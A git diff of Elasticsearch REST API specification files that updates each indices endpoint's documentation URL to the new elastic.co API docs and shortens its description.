3a3f279775fa8..dd70e98ecd5ce 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create.json @@ -1,8 +1,8 @@ { "indices.create":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-create-index.html", - "description":"Creates an index with optional settings and mappings." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create", + "description":"Create an index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json index 3df9232c3a5c2..e1a9454ba143b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_data_stream.json @@ -1,8 +1,8 @@ { "indices.create_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Creates a data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create-data-stream", + "description":"Create a data stream" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json index 435430b7a2673..24c30d76d3b5d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.create_from.json @@ -1,8 +1,8 @@ { "indices.create_from":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-create-index-from-source.html", - "description":"This API creates a destination from a source index. It copies the mappings and settings from the source index while allowing request settings and mappings to override the source values." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create-from", + "description":"Create an index from a source index" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json index 90a3574d5b4bc..501e915713181 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.data_streams_stats.json @@ -1,8 +1,8 @@ { "indices.data_streams_stats":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Provides statistics on operations happening in a data stream." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-data-streams-stats-1", + "description":"Get data stream stats" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json index d066c745b94ac..8ccd387ba8a4c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete.json @@ -1,8 +1,8 @@ { "indices.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-index.html", - "description":"Deletes an index." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete", + "description":"Delete indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json index 7ec072a4582d9..10d2b3f08e8c2 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_alias.json @@ -1,8 +1,8 @@ { "indices.delete_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Deletes an alias." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-alias", + "description":"Delete an alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json index 92b3ce61b4603..e0871e6cf3563 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.delete_data_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-delete-lifecycle.html", - "description":"Deletes the data stream lifecycle of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-lifecycle", + "description":"Delete data stream lifecycles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json index dc9da50e0417b..a46fbc0b7f98f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream.json @@ -1,8 +1,8 @@ { "indices.delete_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Deletes a data stream." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-stream", + "description":"Delete data streams" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json index 916ee0c5b59df..82393f819ed04 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_data_stream_options.json @@ -1,8 +1,8 @@ { "indices.delete_data_stream_options":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Deletes the data stream options of the selected data streams." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-stream-options", + "description":"Delete data stream options" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json index e920ec09351ec..29804904efc4c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_index_template.json @@ -1,8 +1,8 @@ { "indices.delete_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-template.html", - "description":"Deletes an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-index-template", + "description":"Delete an index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json index b0471b9dafa7e..e35963382361b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.delete_template.json @@ -1,8 +1,8 @@ { "indices.delete_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-delete-template-v1.html", - "description":"Deletes an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-template", + "description":"Delete a legacy index template" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json index 822d6ce9f84df..a2f7a3a216541 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.disk_usage.json @@ -1,8 +1,8 @@ { "indices.disk_usage": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-disk-usage.html", - "description": "Analyzes the disk usage of each field of an index or data stream" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-disk-usage", + "description": "Analyze the index disk usage" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json index c67d566790ea6..bb7dc0bba5f7f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.downsample.json @@ -1,7 +1,7 @@ { "indices.downsample":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/xpack-rollup.html", + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-downsample", "description":"Downsample an index" }, "stability":"experimental", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json index b8e18348f489a..12bd81748b27b 100644 
--- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists.json @@ -1,8 +1,8 @@ { "indices.exists":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-exists.html", - "description":"Returns information about whether a particular index exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists", + "description":"Check indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json index 7c855335efd00..ae3667770b60b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_alias.json @@ -1,8 +1,8 @@ { "indices.exists_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Returns information about whether a particular alias exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists-alias", + "description":"Check aliases" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json index 0163b0bbbd8ce..5c57e705d6194 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_index_template.json @@ -1,8 +1,8 @@ { "indices.exists_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/index-templates.html", - "description":"Returns information about whether a particular index template exists." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists-index-template", + "description":"Check index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json index a7f272af5b307..169c216c8db4e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.exists_template.json @@ -1,8 +1,8 @@ { "indices.exists_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-template-exists-v1.html", - "description":"Returns information about whether a particular index template exists." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-exists-template", + "description":"Check existence of index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json index 14e07ee28a80d..595c7f917dc56 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.explain_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.explain_data_lifecycle": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/data-streams-explain-lifecycle.html", - "description": "Retrieves information about the index's current data stream lifecycle, such as any potential encountered error, time since creation etc." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-explain-data-lifecycle", + "description": "Get the status for a data stream lifecycle" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json index efdbdfa4d422a..701f13e4555a0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.field_usage_stats.json @@ -1,8 +1,8 @@ { "indices.field_usage_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/field-usage-stats.html", - "description": "Returns the field usage stats for each field of an index" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-field-usage-stats", + "description": "Get field usage stats" }, "stability": "experimental", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json index f48f9ad1b1803..4a218bb7d3b11 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.flush.json @@ -1,8 +1,8 @@ { "indices.flush":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-flush.html", - "description":"Performs the flush operation on one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-flush", + "description":"Flush data streams or indices" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json index d6ef92551701e..1b0b90581cd6f 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.forcemerge.json @@ -1,8 +1,8 @@ { "indices.forcemerge":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-forcemerge.html", - "description":"Performs the force merge operation on one or more indices." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge", + "description":"Force a merge" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json index e0cd96e346a7b..83e6c13ed4b95 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get.json @@ -1,8 +1,8 @@ { "indices.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-index.html", - "description":"Returns information about one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get", + "description":"Get index information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json index a360582a44a04..e0a59e6782b09 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_alias.json @@ -1,8 +1,8 @@ { "indices.get_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Returns an alias." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-alias", + "description":"Get aliases" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json index a8d2e7185db83..5c46ab33c6411 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.get_data_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-get-lifecycle.html", - "description":"Returns the data stream lifecycle of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-lifecycle", + "description":"Get data stream lifecycles" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json index 8c9e947903402..d8d83f2b7d51b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_lifecycle_stats.json @@ -1,8 +1,8 @@ { "indices.get_data_lifecycle_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-get-lifecycle-stats.html", - "description": "Get data stream lifecycle statistics." 
+ "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-lifecycle-stats", + "description": "Get data stream lifecycle stats" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json index 2a95e2552bb33..7c59270862b04 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream.json @@ -1,8 +1,8 @@ { "indices.get_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Returns data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream", + "description":"Get data streams" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json index c882dc7f7b0a9..78ce97daa0d9c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_options.json @@ -1,8 +1,8 @@ { "indices.get_data_stream_options":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Returns the data stream options of the selected data streams." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream-options", + "description":"Get data stream options" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json index 15271890a3b79..625f53a5fed51 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_data_stream_settings.json @@ -1,8 +1,8 @@ { "indices.get_data_stream_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Gets a data stream's settings" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream-settings", + "description":"Get data stream settings" }, "stability":"stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json index 19b3ac54769cc..2329043d93890 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_field_mapping.json @@ -1,8 +1,8 @@ { "indices.get_field_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-field-mapping.html", - "description":"Returns mapping for one or more fields." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping", + "description":"Get mapping definitions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json index f0351ce8cfe94..fdf03960defee 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_index_template.json @@ -1,8 +1,8 @@ { "indices.get_index_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-template.html", - "description":"Returns an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-index-template", + "description":"Get index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json index aef4713102553..afc259d84e095 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_mapping.json @@ -1,8 +1,8 @@ { "indices.get_mapping":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-mapping.html", - "description":"Returns mappings for one or more indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping", + "description":"Get mapping definitions" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json index d166f3e99197b..2bc1932513a30 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_migrate_reindex_status.json @@ -1,8 +1,8 @@ { "indices.get_migrate_reindex_status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-stream-reindex-status-api.html", - "description":"This API returns the status of a migration reindex attempt for a data stream or index" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-migration", + "description":"Get the migration reindexing status" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json index 61e785abdfb84..05d5a201b1efd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_settings.json @@ -1,8 +1,8 @@ { "indices.get_settings":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-settings.html", - "description":"Returns settings for one or more indices." 
+ "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-settings", + "description":"Get index settings" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json index 74fdd1ef5c8a1..7d691a624069d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.get_template.json @@ -1,8 +1,8 @@ { "indices.get_template":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-get-template-v1.html", - "description":"Returns an index template." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-template", + "description":"Get legacy index templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json index 28cef97c7360a..ad9f8427ec3ec 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_reindex.json @@ -1,8 +1,8 @@ { "indices.migrate_reindex":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-stream-reindex-api.html", - "description":"This API reindexes all legacy backing indices for a data stream. It does this in a persistent task. The persistent task id is returned immediately, and the reindexing work is completed in that task" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-migrate-reindex", + "description":"Reindex legacy backing indices" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json index 879f086cc0675..7d8836b8c7753 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.migrate_to_data_stream.json @@ -1,8 +1,8 @@ { "indices.migrate_to_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Migrates an alias to a data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-migrate-to-data-stream", + "description":"Convert an index alias to a data stream" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json index ea095289b72bc..8ccddf926f725 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.modify_data_stream.json @@ -1,8 +1,8 @@ { "indices.modify_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Modifies a data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-modify-data-stream", + "description":"Update data streams" }, 
"stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json index e6c1646d2b01b..8f9db2e98629b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.open.json @@ -1,8 +1,8 @@ { "indices.open":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-open-close.html", - "description":"Opens an index." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-open", + "description":"Open a closed index" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json index 8c4c747fa8c16..67097fa433673 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.promote_data_stream.json @@ -1,8 +1,8 @@ { "indices.promote_data_stream":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams.html", - "description":"Promotes a data stream from a replicated data stream managed by CCR to a regular data stream" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-promote-data-stream", + "description":"Promote a data stream" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json index 953f119a30a3f..2260449ba7164 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_alias.json @@ -1,8 +1,8 @@ { "indices.put_alias":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/indices-aliases.html", - "description":"Creates or updates an alias." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-alias", + "description":"Create or update an alias" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json index 0a2f7b33498cf..4b08e53f90278 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/indices.put_data_lifecycle.json @@ -1,8 +1,8 @@ { "indices.put_data_lifecycle":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/data-streams-put-lifecycle.html", - "description":"Updates the data stream lifecycle of the selected data streams." 
